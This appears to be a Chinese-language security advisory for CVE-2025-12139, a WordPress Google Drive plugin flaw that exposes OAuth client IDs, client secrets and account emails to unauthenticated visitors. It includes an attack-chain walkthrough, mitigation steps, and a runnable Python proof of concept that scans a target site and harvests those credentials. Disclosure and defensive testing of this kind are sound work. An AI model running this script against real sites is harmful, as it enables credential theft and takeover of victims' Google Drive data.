CVE-2025-12139 WordPress Google Drive文件管理器敏感信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-12139

漏洞类型

敏感信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

File Manager for Google Drive – Integrate Google Drive with WordPress

漏洞概述

CVE-2025-12139是WordPress平台上一款流行的Google Drive文件管理器插件中存在的高危安全漏洞。该插件名为"File Manager for Google Drive – Integrate Google Drive with WordPress"，主要用于将Google Drive服务与WordPress网站进行集成，允许用户直接在WordPress后台管理Google Drive文件。然而，由于插件在开发过程中对敏感数据的处理不当，导致存在严重的信息泄露风险。漏洞存在于插件的"get_localize_data"函数中，该函数在未经任何认证和授权验证的情况下，直接将敏感信息输出到前端页面。攻击者无需任何权限即可利用此漏洞，通过调用相关接口获取包括Google OAuth凭据（client_id和client_secret）以及Google账户邮箱地址在内的敏感信息。这些凭据一旦被攻击者获取，可能导致受害网站的Google云服务被非法接管，进而造成数据泄露、业务中断等严重后果。鉴于该漏洞影响版本广泛且利用难度低，建议所有使用该插件的用户立即采取修复措施。

技术细节

该漏洞的核心问题在于插件的"get_localize_data"函数存在访问控制缺陷。在正常情况下，WordPress插件中的一些前端数据通常通过wp_localize_script或wp_add_inline_script函数注入到页面中，用于前端JavaScript代码调用。这些数据应当经过严格的权限校验和脱敏处理。然而，该插件的开发者在实现过程中，直接将包含Google OAuth认证信息的敏感数据通过这些函数暴露给前端，且未实施任何身份验证机制。具体而言，攻击者可以通过向目标网站发送特制的HTTP请求，触发相关JavaScript代码执行，从而获取window对象中存储的OAuth凭据。漏洞代码位于插件的class-enqueue.php文件第232、243和88行附近。攻击者利用此漏洞可以获取client_id和client_secret，这些凭据对应的是在Google Cloud Console注册的应用。攻击者利用这些凭据可以伪装成合法应用，进一步获取用户Google Drive中的敏感文件数据。此外，攻击者还能获取管理员绑定的Google账户邮箱地址，这为后续的社交工程攻击提供了素材。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描目标WordPress网站，识别是否安装了File Manager for Google Drive插件

STEP 2

步骤2

信息收集：攻击者访问网站前端页面或相关JavaScript文件，触发get_localize_data函数加载敏感数据

STEP 3

步骤3

数据提取：通过分析页面源代码或JavaScript响应，攻击者提取Google OAuth client_id和client_secret

STEP 4

步骤4

凭据滥用：攻击者使用窃取的OAuth凭据，伪装成合法应用访问受害者的Google Drive资源

STEP 5

步骤5

横向移动：获取存储在Google Drive中的敏感文件、文档、图片等数据

STEP 6

步骤6

持续控制：攻击者可利用获取的邮箱地址进行社交工程攻击，或在Google Cloud上注册恶意应用进一步扩大攻击面

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-12139 PoC - WordPress Google Drive File Manager Information Disclosure
# Affected Plugin: File Manager for Google Drive - Integrate Google Drive with WordPress
# Affected Version: <= 1.5.3
# CVSS Score: 7.5 (High)

import requests
import re
import json
from urllib.parse import urljoin

def extract_sensitive_data(target_url):
    """
    Extract sensitive information from the vulnerable WordPress plugin.
    This PoC demonstrates how unauthenticated attackers can obtain:
    - Google OAuth client_id
    - Google OAuth client_secret
    - Google account email addresses
    """
    results = {
        'vulnerable': False,
        'sensitive_data': {},
        'endpoints': []
    }
    
    # Common WordPress paths for the vulnerable script
    paths = [
        '/wp-content/plugins/integrate-google-drive/assets/js/backend.min.js',
        '/wp-content/plugins/integrate-google-drive/build/backend.js',
        '/wp-admin/admin-ajax.php',
        '/'
    ]
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    }
    
    for path in paths:
        url = urljoin(target_url, path)
        try:
            response = requests.get(url, headers=headers, timeout=10, verify=False)
            if response.status_code == 200:
                # Search for OAuth credentials in response
                client_id_pattern = r'["\']?client_id["\']?\s*[:=]\s*["\']([^"\'\s]+)["\']'
                client_secret_pattern = r'["\']?client_secret["\']?\s*[:=]\s*["\']([^"\'\s]+)["\']'
                email_pattern = r'["\']?[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}["\']'
                
                client_ids = re.findall(client_id_pattern, response.text)
                client_secrets = re.findall(client_secret_pattern, response.text)
                emails = re.findall(email_pattern, response.text)
                
                if client_ids or client_secrets:
                    results['vulnerable'] = True
                    results['endpoints'].append(url)
                    
                    if client_ids:
                        results['sensitive_data']['client_ids'] = list(set(client_ids))
                    if client_secrets:
                        results['sensitive_data']['client_secrets'] = list(set(client_secrets))
                    if emails:
                        results['sensitive_data']['emails'] = list(set(emails))
                        
        except requests.RequestException as e:
            print(f"Error accessing {url}: {e}")
            
    return results

def check_wordpress_plugin(target_url):
    """
    Check if the vulnerable plugin is installed.
    """
    check_paths = [
        '/wp-content/plugins/integrate-google-drive/',
        '/wp-content/plugins/integrate-google-drive/readme.txt',
        '/wp-content/plugins/integrate-google-drive/integrate-google-drive.php'
    ]
    
    for path in check_paths:
        url = urljoin(target_url, path)
        try:
            response = requests.get(url, timeout=10, verify=False)
            if response.status_code == 200:
                return True
        except:
            continue
    return False

if __name__ == '__main__':
    import sys
    
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-12139.py <target_url>")
        print("Example: python cve-2025-12139.py http://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] Checking target: {target}")
    print(f"[*] CVE-2025-12139 - WordPress Google Drive Plugin Information Disclosure\n")
    
    # Check if plugin is installed
    if check_wordpress_plugin(target):
        print("[+] Vulnerable plugin detected!")
    else:
        print("[-] Plugin not found or target is not a WordPress site")
    
    # Extract sensitive data
    results = extract_sensitive_data(target)
    
    if results['vulnerable']:
        print("[+] VULNERABLE - Sensitive data found!")
        print(f"\n[+] Endpoints with sensitive data:")
        for endpoint in results['endpoints']:
            print(f"  - {endpoint}")
        
        print(f"\n[+] Extracted sensitive information:")
        if 'client_ids' in results['sensitive_data']:
            print(f"  Client IDs: {', '.join(results['sensitive_data']['client_ids'])}")
        if 'client_secrets' in results['sensitive_data']:
            print(f"  Client Secrets: {', '.join(results['sensitive_data']['client_secrets'])}")
        if 'emails' in results['sensitive_data']:
            print(f"  Email Addresses: {', '.join(results['sensitive_data']['emails'])}")
    else:
        print("[-] No sensitive data detected (may be patched or not vulnerable)")
    
    print("\n[!] Disclaimer: This PoC is for authorized security testing only.")

影响范围

File Manager for Google Drive WordPress插件 <= 1.5.3（所有版本）

防御指南

临时缓解措施

在等待官方修复期间，建议采取以下临时缓解措施：首先，立即禁用并删除该插件，或将其替换为其他安全可靠的Google Drive集成方案；其次，检查Google Cloud Console中的OAuth凭据使用情况，如发现异常立即撤销并重新生成新的凭据；最后，可以考虑在Web服务器层面添加访问控制规则，限制对插件相关JavaScript文件和API端点的未授权访问。此外，建议启用WordPress的安全日志记录功能，监控是否存在针对该漏洞的扫描和利用行为。